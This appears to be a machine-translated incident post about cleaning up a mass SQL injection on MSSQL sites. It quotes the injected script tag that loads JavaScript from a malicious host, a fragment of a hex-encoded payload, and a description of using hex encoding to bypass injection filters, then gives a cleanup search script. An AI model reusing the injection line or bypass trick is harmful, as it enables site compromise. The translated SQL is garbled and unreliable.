------------------------------------------------------------
Website hacked kill_kk/Xiaolu/daxia123.cn Trojan solution and cause
The customer site cannot be generated and is infected with Trojans. Find the reason.
Status quo:
Each CMS system cannot be generated, but other operations are normal. Generally, the system prompts "<'syntax error nearby" and "The path parameter exceeds the maximum allowed length ."
Affected objects: websites using the MSSQL database
Symptom content: Trojan code appears in multiple tables, such as <SCRIPT src = http://cn.daxia123.cn/cn.js> </SCRIPT>
New tables appear in the database, such as the kill_kk table and Xiaolu table.
The analysis is as follows:
The kill_kk table is a tool used by intruders to read the root directory of the website. All Folders and file names under the root directory of the compromised website are saved here.
Xiaolu table: there is only one field cmd, binary bit. The reason is unknown.
Trojan content appears in fields in multiple tables. Most of the fields are vchar, and the field length is greater than 100,
The cause of the attack is as follows:
Attackers can compile the attack code in binary or 10 or 10 to a code similar to the following: 0x4445434c415245204054205621324348415228323535292c404 the SQL Injection Code cannot be detected, however, SQL Server interprets the code as original.
This bypasses the SQL anti-injection code.
However, this code is only valid for databases such as SQL server that can interpret it, and database type attacks that cannot be interpreted such as access are invalid.
We hope Microsoft can release patches as soon as possible.
Temporary clearing method:
1. batch search for which tables are infected with Trojans. This step is useful for large sites and multiple tables.
Declare @ str varchar (100)
Set @ str = 'daxia123' // enter the keyword of your Trojan;
Declare @ s varchar (8000)
Declare tb cursor local
Select s = 'if exists (select 1 from ['+ B. name +'] where ['+ a. name +'] like % + @ str + %)
Print ''table and field: ['+ B. name +']. ['+ a. name +'] '''
From syscolumns a join sysobjects B on a. id = B. id
Where B. xtype = 'U' and a. status> = 0
And a. xusertype in (175,239,231,167)
Open tb
Fetch next from tb into @ s
While @ fetch_status = 0
Begin
Exec (@ s)
Fetch next from tb into @ s
End
Close TB
Deallocate TB
After the code is executed, you will be prompted which tables are recruited.
Then you can clear the related fields.
Temporary solution:
Find all fields of the vchar type with a large field length and try to change the length to a smaller value.
Then, we can determine the length of the post value to solve the problem temporarily.